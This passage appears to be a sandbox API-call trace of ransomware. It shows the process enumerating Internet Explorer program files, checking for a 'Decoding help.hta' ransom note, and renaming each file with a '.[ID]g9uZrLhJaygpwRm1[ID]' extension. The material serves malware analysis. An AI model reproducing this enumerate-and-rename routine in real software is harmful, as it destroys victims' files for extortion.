lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" [0039.112] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.112] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0039.112] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.112] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.112] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ielowutil.exe") returned -1 [0039.113] lstrlenW (lpString="ielowutil.exe") returned 13 [0039.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="ielowutil.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" [0039.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" [0039.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.113] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0039.113] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.113] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieproxy.dll") returned -1 [0039.113] lstrlenW (lpString="ieproxy.dll") returned 11 [0039.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="ieproxy.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" [0039.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" [0039.113] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.113] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0039.113] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.114] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IEShims.dll") returned -1 [0039.114] lstrlenW (lpString="IEShims.dll") returned 11 [0039.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="IEShims.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" [0039.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\ieshims.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.114] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0039.114] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.114] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iexplore.exe") returned -1 [0039.114] lstrlenW (lpString="iexplore.exe") returned 12 [0039.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="iexplore.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" [0039.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" [0039.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\iexplore.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.115] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0039.115] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.115] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.115] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdbgui.dll") returned -1 [0039.115] lstrlenW (lpString="jsdbgui.dll") returned 11 [0039.115] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.115] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="jsdbgui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" [0039.115] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" [0039.115] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.115] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0039.116] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.116] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdebuggeride.dll") returned -1 [0039.116] lstrlenW (lpString="jsdebuggeride.dll") returned 17 [0039.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="jsdebuggeride.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" [0039.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.116] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0039.116] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.116] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JSProfilerCore.dll") returned -1 [0039.116] lstrlenW (lpString="JSProfilerCore.dll") returned 18 [0039.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="JSProfilerCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" [0039.116] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" [0039.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.129] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0039.129] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.129] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsprofilerui.dll") returned -1 [0039.129] lstrlenW (lpString="jsprofilerui.dll") returned 16 [0039.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="jsprofilerui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" [0039.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" [0039.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.130] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0039.130] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.130] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program 